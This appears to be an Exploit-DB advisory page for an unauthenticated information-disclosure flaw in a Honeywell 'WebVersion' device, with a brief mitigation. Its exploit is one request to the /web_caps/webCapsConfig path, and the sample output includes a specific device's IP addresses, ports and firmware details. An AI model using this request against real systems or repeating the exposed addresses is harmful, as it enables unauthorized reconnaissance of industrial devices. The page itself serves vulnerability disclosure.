Honeywell Scada System - Information Disclosure

vendor:

WebVersion

by:

t4rkd3vilz

8.8

CVSS

HIGH

Information Disclosure

200

CWE

Product Name: WebVersion

Affected Version From: 3.2.1.294365

Affected Version To: 3.3.37.274972

Patch Exists: NO

Related CWE: N/A

CPE: a:honeywell:webversion:3.2.1.294365

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Linux

2018

Honeywell Scada System – Information Disclosure

An attacker can download a file containing critical information about the destination address by accessing the URL https://TargetIp/web_caps/webCapsConfig

Mitigation:

Restrict access to the URL https://TargetIp/web_caps/webCapsConfig and ensure that only authorized personnel have access to the file.

Source

Exploit-DB raw data:

# Exploit Title: Honeywell Scada System - Information Disclosure
# Date: 2018-05-23
# Exploit Author: t4rkd3vilz
# Vendor Homepage: https://www.honeywell.com
# Version: WebVersion : 3.2.1.294365 - DeviceType : IPC-HFW2320R-ZS
# Tested on: Linux

# To be written after the destination IP address /web_caps/webCapsConfig
# the downloaded file opens with the file name. The file contains
# critical information about the destination address

https://TargetIp/web_caps/webCapsConfig

# Result:

"Anonymous" : false,
   "DeviceSubClass" : "Unknown",
   "HttpPort" : {
      "InnerPort" : 80
   },
   "HttpsPort" : {
      "InnerPort" : 443
   },
   "NAS_Protocol_Mask" : 100,
   "PluginVersion" : "3.3.37.274972",
   "TCPPort" : 37777,
   "WebVersion" : "3.2.1.294365",
   "deviceType" : "IPC-HFW2320R-ZS",
   "eth0" : {
      "IPAddress" : "36.67.33.226",
      "IPv6Address" : "2001:250:3000:1::1:2"